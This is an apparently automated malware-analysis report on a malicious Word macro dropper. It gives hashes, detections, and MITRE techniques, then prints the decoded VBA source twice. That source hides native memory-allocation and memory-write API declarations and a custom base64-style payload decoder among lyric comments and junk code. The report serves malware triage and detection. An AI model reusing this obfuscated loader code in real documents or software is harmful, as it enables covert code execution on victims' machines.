Office (OLE) malware analysis — malicious · 8b1585b6fbb5eda8

MALICIOUS

Office (OLE)

168.0 KB Created: 2017-02-20 12:58:00 Authoring application: Microsoft Office Word First seen: 2017-08-08

MD5: 88aa22982ed11b76bd034484ca9226d7 SHA-1: 578c1cf74e5a3401a3db4e45c030aa1c3f818ff9 SHA-256: 8b1585b6fbb5eda8d36e898c791d28aa4a463f9bad6a044885b240a1b33f5e03

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros that are configured to auto-execute upon opening, specifically using the 'Document_Open' event to call the 'Shell' function. This indicates a dropper functionality. The heuristic 'SE_MFA_LURE' suggests the document's content is designed to trick users into approving multi-factor authentication requests or providing one-time codes, aligning with credential harvesting tactics. The ClamAV detection 'Doc.Dropper.ZwMacros-6057750-0' further confirms its malicious nature as a macro-based dropper.

Heuristics 5

ClamAV: Doc.Dropper.ZwMacros-6057750-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
MFA / one-time-code harvesting lure high SE_MFA_LURE

Document asks for a one-time code, authenticator approval, or MFA confirmation — consistent with credential phishing kits that steal session tokens or abuse multi-factor authentication
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8997 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8997 bytes
SHA-256: `4e37b735f5e0ee47fc81a6e010b0d16cb3f16de020703b75ecd0cd9174c08ecb`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "berteroa" ' Chasing the stars, chasing the stars ' Wings spread to the sun #If Win64 Then ' I miss you so much, I miss you so much ' Love don't come easy at all Public Declare PtrSafe Function straightaway Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal pimp As LongPtr,amauropelta As LongPtr,frogbit As LongPtr,monosaccharide As LongPtr,connecticuter As LongPtr) As Boolean ' I miss you so much, I miss you so much ' I miss you so much, I miss you so much Public Declare PtrSafe Function dii Lib "Shell32.dll" Alias "SHGetDesktopFolder" (squaw As LongPtr) ' ' Public Declare PtrSafe Function musnud Lib "Shlwapi.dll" Alias "PathFileExists" (berkshires As LongPtr) As LongPtr ' I miss you so much, I miss you so much ' Public Declare PtrSafe Function argentic Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal optinionist As Any, ByVal cyanosis As Any, ByVal subdolous As Any, ByVal orthoptera As Any, ByVal garble As Any) As LongPtr ' Baby I'm yours, baby I'm yours ' I miss you so much, I miss you so much Public Declare PtrSafe Function cured Lib "User32.dll" Alias "GrayStringA" ( ByVal ketoprofen As Any, ByVal fulgoridae As Any, ByVal crystallization As Any, ByVal feria As Any, ByVal fenian As Any, ByVal asking As Any, ByVal accreditation As Any, ByVal nonassemblage As Any, ByVal chlorate As Any) As Long ' Baby I'm yours, baby I'm yours ' I miss you so much, I miss you so much Public Declare PtrSafe Function aerological Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (muzzy As LongPtr, land As Any,crossquestion As LongPtr, outdoor As Any) As Boolean ' ' Chasing after danger, making my heart race, woah Public Declare PtrSafe Function autarky Lib "Shell32.dll" Alias "SHGetSettings" (tetchily As LongPtr,belong As LongPtr) As LongPtr ' He was a dreamer at heart ' Public Declare PtrSafe Function mammalogy Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (flyblown As LongPtr, oversolicitous As LongPtr, ByVal iranian As LongPtr,berkeliumByVal As LongPtr, bifurcated As LongPtr, ByVal ultimatum As LongPtr) As LongPtr ' I miss you so much, I miss you so much ' I miss you so much, I miss you so much ' Tell me, is this freedom, baby? ' Wings spread to the sun #Else ' Maybe in a million miles, on a highway through the skies ' I miss you so much, I miss you so much Public Declare Function surrealism Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (taxonomy As Long, balconied As Any, shindig As Long, avenger As Any) As Boolean ' Maybe if the stars align, maybe if our worlds collide ' Someday soon, we'll be together Public Declare Function cured Lib "User32.dll" Alias "GrayStringA" (ByVal merchangman As Any, ByVal mesic As Any, ByVal flu As Any, ByVal psychopharmacological As Any, ByVal hammered As Any, ByVal attestation As Any, ByVal sinewless As Any, ByVal wolof As Any, ByVal dyad As Any) As Long ' ' Public Declare Function argentic Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal restraint As Any, ByVal vituperation As Any, ByVal tsquare As Any, ByVal pediculidae As Any, ByVal layia As Any) As Long ' ' Chasing after danger, making my heart race, woah Public Declare Function symphoricarpos Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal paleacrita As Long, embroilment As Long, indestructible As Long, drugs As Long, bitumen As Long) As Boolean ' ' He was a dreamer at heart Public Declare Function pins Lib "Shlwapi.dll" Alias "PathFileExists" (regentship As Long) As Long ' Baby I'm yours, baby I'm yours ' Maybe in a million miles, on a highway through the skies Public Declare Function perambulate Lib "Shell32.dll" Alias "SHGetDesktopFolder" (balinese As Long) ' Someday soon, we'll be together ' Public Declare Function mammalogy Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (iridium As Long, daemon As Long, ByVal endomorph As Long, suckleByVal As Long, arietation As Long, ByVal coxswain As Long) As Long ' Maybe in a million miles, on a highway through the skies ' Chasing the stars, chasing the stars Public Declare Function alytes Lib "Shell32.dll" Alias "SHGetSettings" (dendrolagus As Long, bootlegger As Long) As Long ' ' Tell me, is this freedom, baby? ' ' #End If ' Baby I'm yours, baby I'm yours ' He was a dreamer at heart Sub GenerateGlossary() Dim strSource As String Dim strDestination As String Dim strGlossaryName As String strSource = ActiveWindow.Caption strGlossaryName = "word" Documents.Add ActiveDocument.SaveAs FileName:=strGlossaryName, FileFormat:=wdFormatDocument strDestination = ActiveWindow.Caption Windows(strSource).Activate End Sub Function task() Dim antigen(255) As Byte adder = 65 Do antigen(adder) = adder - 65 adder = adder + 1 Loop Until adder = 91 adder = 48 Do antigen(adder) = adder + 4 adder = adder + 1 Loop Until adder = 58 adder = 97 Do antigen(adder) = adder - 71 adder = adder + 1 Loop Until adder = 123 antigen(47) = 63 adder = 43 antigen(adder) = 62 task = antigen End Function Function walkin(kanchenjunga) walkin = AscW(kanchenjunga) End Function Function cloudcompeller(courtier) As String Dim corinthians As Long Dim motto As Long Dim connote As Integer Dim selfforgetful As Long Dim abdal(63) As Long Dim embellished() As Byte elegy = electrotherapist Dim wahrheil As String Dim ardor As Integer Dim airfield(63) As Long Dim rupert(6965) As Byte Dim beached As Byte lusterware = Fix(109) Dim abecedarian As Long Dim conjugation As Byte Dim arterial(63) As Long Dim brat As Byte electrotherapist = electrotherapist cervine = 30 - 46 + 4112 Dim gaga As Variant aft = 63 Dim essaying As Integer abnormal = 65280 scrannel = 256 additionally = 124 + 3908 althea = 71 + 184 heterobasidiomycetes = 65536 equipollent = 258048 indirectly = 97 + 16514975 flooded = 124 + 2 - 62 mick = 106 + 16711574 Dim absently As String gadding = 262144 Dim disturb As Variant pickeer = 0 platter = 40 + 98 + 5705 Dim duodecimal() As Byte Dim munditiis As String duodecimal = VBA.Strings.StrConv(courtier, vbFromUnicode) Dim paradisaeidae As Variant bilgy = 94 appetizingness = 30442 bacchanalia = 162378 autotelic = NPer(57 / 464, bilgy, -19855, bacchanalia, 1) spherule = 5843 delenda = Sqr(RGB(0, 1, 0)) For evulsion = 0 To spherule If evulsion Mod 2 = 0 Then duodecimal(evulsion) = duodecimal(evulsion) + delenda Else duodecimal(evulsion) = duodecimal(evulsion) + delenda - 1 End If Next evulsion melanoblast = 4 challengeable = 184 irishism = 57516 cenogenetic = 365762 cenogenetic = SYD(cenogenetic, irishism, challengeable, melanoblast) connote = 0 edel = 96 + 122 + 26 - 244 maxillomandibular = 18 + 25 basswood = task For selfforgetful = 0 To 63 abdal(selfforgetful) = subsonic(selfforgetful, flooded, 33) airfield(selfforgetful) = subsonic(selfforgetful, cervine, 33) arterial(selfforgetful) = subsonic(selfforgetful, gadding, 33) Next selfforgetful disunction = 86 harding = 14384 bast = 517527 brassband = NPer(73 / 585, disunction, -12947, bast, 0) embellished = duodecimal conidium = 69 - 103 - 6 + 44 bokmal = 2 fourspot = 330 tenax = 20128 slackening = 455545 slackening = SYD(slackening, tenax, fourspot, bokmal) miseria = 3 kilt = Rnd(72) kilt = geometridae / 442 forgetfulness = miseria + 1 deceptious = 2 For corinthians = 0 To spherule pendragon = embellished(corinthians) aether = embellished(corinthians + 2) abecedarian = arterial(basswood(pendragon)) _ + airfield(basswood(embellished(corinthians + 1))) + abdal(basswood(aether)) + basswood(embellished(corinthians + miseria)) selfforgetful = subsonic(abecedarian, mick, 25) rupert(motto) = subsonic(selfforgetful, heterobasidiomycetes, 15) selfforgetful = subsonic(abecedarian, abnormal, 25) rupert(motto + 1) = subsonic(selfforgetful, scrannel, 15) rupert(motto + deceptious) = subsonic(abecedarian, althea, 25) motto = motto + deceptious + 1 corinthians = corinthians + 3 Next cloudcompeller = rupert End Function Function subsonic(bridge, katharometer, promotional) Select Case promotional Case 15 subsonic = bridge \ katharometer Case 25 subsonic = bridge And katharometer Case 33 subsonic = bridge * katharometer End Select End Function Attribute VB_Name = "atlarge" Attribute VB_Base = "0{CFC1189C-072B-470A-A2DA-618C4AA7F2C5}{B3FBE50C-D5D0-48A8-85F8-3ED4F4B05D82}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: 4e37b735f5e0ee47fc81a6e010b0d16cb3f16de020703b75ecd0cd9174c08ecb

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "berteroa"
'  Chasing the stars, chasing the stars
'  Wings spread to the sun
#If Win64 Then
'  I miss you so much, I miss you so much
'  Love don't come easy at all
Public Declare PtrSafe Function straightaway Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal pimp As LongPtr,amauropelta As LongPtr,frogbit As LongPtr,monosaccharide As LongPtr,connecticuter As LongPtr) As Boolean
'  I miss you so much, I miss you so much
'  I miss you so much, I miss you so much
Public Declare PtrSafe Function dii Lib "Shell32.dll" Alias "SHGetDesktopFolder" (squaw As LongPtr)
'
'
Public Declare PtrSafe Function musnud Lib "Shlwapi.dll" Alias "PathFileExists" (berkshires As LongPtr) As LongPtr
'  I miss you so much, I miss you so much
'
Public Declare PtrSafe Function argentic Lib "Ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal optinionist As Any, ByVal cyanosis As Any, ByVal subdolous As Any, ByVal orthoptera As Any, ByVal garble As Any) As LongPtr
'  Baby I'm yours, baby I'm yours
'  I miss you so much, I miss you so much
Public  Declare PtrSafe Function cured Lib "User32.dll" Alias "GrayStringA" ( ByVal ketoprofen As Any, ByVal fulgoridae As Any, ByVal crystallization As Any, ByVal feria As Any, ByVal fenian As Any, ByVal asking As Any, ByVal accreditation As Any, ByVal nonassemblage As Any, ByVal chlorate As Any) As Long
'  Baby I'm yours, baby I'm yours
'  I miss you so much, I miss you so much
Public Declare PtrSafe Function aerological Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (muzzy As LongPtr, land As Any,crossquestion As LongPtr, outdoor As Any) As Boolean
'
'  Chasing after danger, making my heart race, woah
Public Declare PtrSafe Function autarky Lib "Shell32.dll" Alias "SHGetSettings" (tetchily As LongPtr,belong As LongPtr) As LongPtr
'  He was a dreamer at heart
'
Public Declare PtrSafe Function mammalogy Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (flyblown As LongPtr, oversolicitous As LongPtr, ByVal iranian As LongPtr,berkeliumByVal As LongPtr, bifurcated As LongPtr, ByVal ultimatum As LongPtr) As LongPtr
'  I miss you so much, I miss you so much
'  I miss you so much, I miss you so much

'  Tell me, is this freedom, baby?
'  Wings spread to the sun
#Else
'  Maybe in a million miles, on a highway through the skies
'  I miss you so much, I miss you so much
Public Declare Function surrealism Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (taxonomy As Long, balconied As Any, shindig As Long, avenger As Any) As Boolean
'  Maybe if the stars align, maybe if our worlds collide
'  Someday soon, we'll be together
Public Declare Function cured Lib "User32.dll" Alias "GrayStringA" (ByVal merchangman As Any, ByVal mesic As Any, ByVal flu As Any, ByVal psychopharmacological As Any, ByVal hammered As Any, ByVal attestation As Any, ByVal sinewless As Any, ByVal wolof As Any, ByVal dyad As Any) As Long
'
'
Public Declare Function argentic Lib "Ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal restraint As Any, ByVal vituperation As Any, ByVal tsquare As Any, ByVal pediculidae As Any, ByVal layia As Any) As Long
'
'  Chasing after danger, making my heart race, woah
Public Declare Function symphoricarpos Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal paleacrita As Long, embroilment As Long, indestructible As Long, drugs As Long, bitumen As Long) As Boolean
'
'  He was a dreamer at heart
Public Declare Function pins Lib "Shlwapi.dll" Alias "PathFileExists" (regentship As Long) As Long
'  Baby I'm yours, baby I'm yours
'  Maybe in a million miles, on a highway through the skies
Public Declare Function perambulate Lib "Shell32.dll" Alias "SHGetDesktopFolder" (balinese As Long)
'  Someday soon, we'll be together
'
Public Declare Function mammalogy Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (iridium As Long, daemon As Long, ByVal endomorph As Long, suckleByVal As Long, arietation As Long, ByVal coxswain As Long) As Long
'  Maybe in a million miles, on a highway through the skies
'  Chasing the stars, chasing the stars
Public Declare Function alytes Lib "Shell32.dll" Alias "SHGetSettings" (dendrolagus As Long, bootlegger As Long) As Long
'
'  Tell me, is this freedom, baby?

'
'
#End If
'  Baby I'm yours, baby I'm yours
'  He was a dreamer at heart
Sub GenerateGlossary()
      Dim strSource As String
      Dim strDestination As String
      Dim strGlossaryName As String

      strSource = ActiveWindow.Caption
      strGlossaryName = "word"

      Documents.Add
      ActiveDocument.SaveAs FileName:=strGlossaryName, FileFormat:=wdFormatDocument
      strDestination = ActiveWindow.Caption
      Windows(strSource).Activate
  End Sub

Function task()
Dim antigen(255) As Byte
adder = 65
Do
antigen(adder) = adder - 65
adder = adder + 1
Loop Until adder = 91
adder = 48
Do
antigen(adder) = adder + 4
adder = adder + 1
Loop Until adder = 58
adder = 97
Do
antigen(adder) = adder - 71
adder = adder + 1
Loop Until adder = 123
antigen(47) = 63
adder = 43
antigen(adder) = 62
task = antigen
End Function
Function walkin(kanchenjunga)
walkin = AscW(kanchenjunga)
End Function
Function cloudcompeller(courtier) As String
Dim corinthians As Long
Dim motto As Long
Dim connote As Integer
Dim selfforgetful As Long
Dim abdal(63) As Long
Dim embellished() As Byte
elegy = electrotherapist

Dim wahrheil As String
Dim ardor As Integer

Dim airfield(63) As Long
Dim rupert(6965) As Byte
Dim beached As Byte

lusterware = Fix(109)

Dim abecedarian As Long
Dim conjugation As Byte

Dim arterial(63) As Long
Dim brat As Byte

electrotherapist = electrotherapist

cervine = 30 - 46 + 4112
Dim gaga As Variant

aft = 63
Dim essaying As Integer

abnormal = 65280
scrannel = 256
additionally = 124 + 3908
althea = 71 + 184
heterobasidiomycetes = 65536
equipollent = 258048
indirectly = 97 + 16514975
flooded = 124 + 2 - 62
mick = 106 + 16711574
Dim absently As String

gadding = 262144
Dim disturb As Variant
pickeer = 0
platter = 40 + 98 + 5705
Dim duodecimal() As Byte
Dim munditiis As String
duodecimal = VBA.Strings.StrConv(courtier, vbFromUnicode)
Dim paradisaeidae As Variant
bilgy = 94
appetizingness = 30442
bacchanalia = 162378
autotelic = NPer(57 / 464, bilgy, -19855, bacchanalia, 1)

spherule = 5843
delenda = Sqr(RGB(0, 1, 0))
For evulsion = 0 To spherule
If evulsion Mod 2 = 0 Then
duodecimal(evulsion) = duodecimal(evulsion) + delenda
Else
duodecimal(evulsion) = duodecimal(evulsion) + delenda - 1
End If
Next evulsion
melanoblast = 4
challengeable = 184
irishism = 57516
cenogenetic = 365762
cenogenetic = SYD(cenogenetic, irishism, challengeable, melanoblast)

connote = 0
edel = 96 + 122 + 26 - 244
maxillomandibular = 18 + 25
basswood = task
For selfforgetful = 0 To 63
abdal(selfforgetful) = subsonic(selfforgetful, flooded, 33)
airfield(selfforgetful) = subsonic(selfforgetful, cervine, 33)
arterial(selfforgetful) = subsonic(selfforgetful, gadding, 33)
Next selfforgetful
disunction = 86
harding = 14384
bast = 517527
brassband = NPer(73 / 585, disunction, -12947, bast, 0)

embellished = duodecimal
conidium = 69 - 103 - 6 + 44
bokmal = 2
fourspot = 330
tenax = 20128
slackening = 455545
slackening = SYD(slackening, tenax, fourspot, bokmal)

miseria = 3
kilt = Rnd(72)

kilt = geometridae / 442

forgetfulness = miseria + 1
deceptious = 2
For corinthians = 0 To spherule
pendragon = embellished(corinthians)
aether = embellished(corinthians + 2)
abecedarian = arterial(basswood(pendragon)) _
 + airfield(basswood(embellished(corinthians + 1))) + abdal(basswood(aether)) + basswood(embellished(corinthians + miseria))
selfforgetful = subsonic(abecedarian, mick, 25)
rupert(motto) = subsonic(selfforgetful, heterobasidiomycetes, 15)
selfforgetful = subsonic(abecedarian, abnormal, 25)
rupert(motto + 1) = subsonic(selfforgetful, scrannel, 15)
rupert(motto + deceptious) = subsonic(abecedarian, althea, 25)
motto = motto + deceptious + 1
corinthians = corinthians + 3
Next
cloudcompeller = rupert
End Function

Function subsonic(bridge, katharometer, promotional)
Select Case promotional
Case 15
subsonic = bridge \ katharometer
Case 25
subsonic = bridge And katharometer
Case 33
subsonic = bridge * katharometer
End Select
End Function


Attribute VB_Name = "atlarge"
Attribute VB_Base = "0{CFC1189C-072B-470A-A2DA-618C4AA7F2C5}{B3FBE50C-D5D0-48A8-85F8-3ED4F4B05D82}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.